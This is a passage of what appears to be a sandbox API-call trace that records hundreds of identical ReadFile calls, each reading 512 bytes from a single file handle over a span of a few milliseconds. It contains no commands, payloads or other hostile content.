lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, 
lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile 
(in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 
[0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, 
lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, 
lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: 
lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, 
lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, 
lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile 
